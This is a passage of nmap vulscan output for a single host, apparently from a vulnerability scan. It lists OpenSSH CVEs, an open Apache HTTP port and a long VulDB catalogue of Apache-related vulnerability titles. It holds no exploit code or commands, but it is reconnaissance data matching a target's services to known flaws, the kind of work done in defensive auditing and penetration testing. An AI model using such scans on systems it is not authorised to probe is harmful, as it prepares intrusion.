6955| [CVE-2010-4478] OpenSSH 5.6 and earlier, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol, a related issue to CVE-2010-4252.
6956| [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
6957| [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
6958| [CVE-2008-3259] OpenSSH before 5.1 sets the SO_REUSEADDR socket option when the X11UseLocalhost configuration setting is disabled, which allows local users on some platforms to hijack the X11 forwarding port via a bind to a single IP address, as demonstrated on the HP-UX platform.
6959|
6960| SecurityFocus - https://www.securityfocus.com/bid/:
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
|
| Exploit-DB - https://www.exploit-db.com:
|
| OpenVAS (Nessus) - http://www.openvas.org:
|
| SecurityTracker - https://www.securitytracker.com:
|
| OSVDB - http://www.osvdb.org:
|_
25/tcp closed smtp
80/tcp open   http       Apache httpd
|_http-server-header: Apache
| vulscan: VulDB - https://vuldb.com:
7733| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
7734| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
7735| [108938] Apple macOS up to 10.13.1 apache denial of service
7736| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
7737| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
7738| [108935] Apple macOS up to 10.13.1 apache denial of service
7739| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
7740| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
7741| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
7742| [108931] Apple macOS up to 10.13.1 apache denial of service
7743| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
7744| [108929] Apple macOS up to 10.13.1 apache denial of service
7745| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
7746| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
7747| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
7748| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
7749| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
7750| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
7751| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
7752| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
7753| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
7754| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
7755| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
7756| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
7757| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
7758| [108782] Apache Xerces2 XML Service denial of service
7759| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
7760| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
7761| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
7762| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
7763| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
7764| [108629] Apache OFBiz up to 10.04.01 privilege escalation
7765| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
7766| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
7767| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
7768| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
7769| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
7770| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
7771| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
7772| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
7773| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
7774| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
7775| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
7776| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
7777| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
7778| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
7779| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
7780| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
7781| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
7782| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
7783| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
7784| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
7785| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
7786| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
7787| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
7788| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
7789| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
7790| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
7791| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
7792| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
7793| [107639] Apache NiFi 1.4.0 XML External Entity
7794| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
7795| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
7796| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
7797| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
7798| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
7799| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
7800| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
7801| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
7802| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
7803| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
7804| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
7805| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
7806| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
7807| [107197] Apache Xerces Jelly Parser XML File XML External Entity
7808| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
7809| [107084] Apache Struts up to 2.3.19 cross site scripting
7810| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
7811| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
7812| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
7813| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
7814| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
7815| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
7816| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
7817| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
7818| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
7819| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
7820| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
7821| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
7822| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
7823| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
7824| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
7825| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
7826| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
7827| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
7828| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
7829| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
7830| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
7831| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
7832| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
7833| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
7834| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
7835| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
7836| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
7837| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
7838| [105878] Apache Struts up to 2.3.24.0 privilege escalation
7839| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
7840| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
7841| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
7842| [105643] Apache Pony Mail up to 0.8b weak authentication
7843| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
7844| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
7845| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
7846| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
7847| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
7848| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
7849| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
7850| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
7851| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
7852| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
7853| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
7854| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
7855| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
7856| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
7857| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
7858| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
7859| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
7860| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
7861| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
7862| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
7863| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
7864| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
7865| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
7866| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
7867| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
7868| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
7869| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
7870| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
7871| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
7872| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
7873| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
7874| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
7875| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
7876| [103690] Apache OpenMeetings 1.0.0 sql injection
7877| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
7878| [103688] Apache OpenMeetings 1.0.0 weak encryption
7879| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
7880| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
7881| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
7882| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
7883| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
7884| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
7885| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
7886| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
7887| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
7888| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
7889| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
7890| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
7891| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
7892| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
7893| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
7894| [103352] Apache Solr Node weak authentication
7895| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
7896| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
7897| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
7898| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
7899| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
7900| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
7901| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
7902| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
7903| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
7904| [102536] Apache Ranger up to 0.6 Stored cross site scripting
7905| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
7906| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
7907| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
7908| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
7909| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
7910| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
7911| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
7912| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
7913| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
7914| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
7915| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
7916| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
7917| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
7918| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
7919| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
7920| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
7921| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
7922| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
7923| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
7924| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
7925| [99937] Apache Batik up to 1.8 privilege escalation
7926| [99936] Apache FOP up to 2.1 privilege escalation
7927| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
7928| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
7929| [99930] Apache Traffic Server up to 6.2.0 denial of service
7930| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
7931| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
7932| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
7933| [117569] Apache Hadoop up to 2.7.3 privilege escalation
7934| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
7935| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
7936| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
7937| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
7938| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
7939| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
7940| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
7941| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
7942| [99014] Apache Camel Jackson/JacksonXML privilege escalation
7943| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
7944| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
7945| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
7946| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
7947| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
7948| [98605] Apple macOS up to 10.12.3 Apache denial of service
7949| [98604] Apple macOS up to 10.12.3 Apache denial of service
7950| [98603] Apple macOS up to 10.12.3 Apache denial of service
7951| [98602] Apple macOS up to 10.12.3 Apache denial of service
7952| [98601] Apple macOS up to 10.12.3 Apache denial of service
7953| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
7954| [98405] Apache Hadoop up to 0.23.10 privilege escalation
7955| [98199] Apache Camel Validation XML External Entity
7956| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
7957| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
7958| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
7959| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
7960| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
7961| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
7962| [97081] Apache Tomcat HTTPS Request denial of service
7963| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
7964| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
7965| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
7966| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
7967| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
7968| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
7969| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
7970| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
7971| [95311] Apache Storm UI Daemon privilege escalation
7972| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
7973| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
7974| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
7975| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
7976| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
7977| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
7978| [94540] Apache Tika 1.9 tika-server File information disclosure
7979| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
7980| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
7981| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
7982| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
7983| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
7984| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
7985| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
7986| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
7987| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
7988| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
7989| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
7990| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
7991| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
7992| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
7993| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
7994| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
7995| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
7996| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
7997| [93532] Apache Commons Collections Library Java privilege escalation
7998| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
7999| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
8000| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
8001| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
8002| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
8003| [93098] Apache Commons FileUpload privilege escalation
8004| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
8005| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
8006| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
8007| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
8008| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
8009| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
8010| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
8011| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
8012| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
8013| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
8014| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
8015| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
8016| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
8017| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
8018| [92549] Apache Tomcat on Red Hat privilege escalation
8019| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
8020| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
8021| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
8022| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
8023| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
8024| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
8025| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
8026| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
8027| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
8028| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
8029| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
8030| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
8031| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
8032| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
8033| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
8034| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
8035| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
8036| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
8037| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
8038| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
8039| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
8040| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
8041| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
8042| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
8043| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
8044| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
8045| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
8046| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
8047| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
8048| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
8049| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
8050| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
8051| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
8052| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
8053| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
8054| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
8055| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
8056| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
| [90263] Apache Archiva Header denial of service
| [90262] Apache Archiva Deserialize privilege escalation
| [90261] Apache Archiva XML DTD Connection privilege escalation
| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
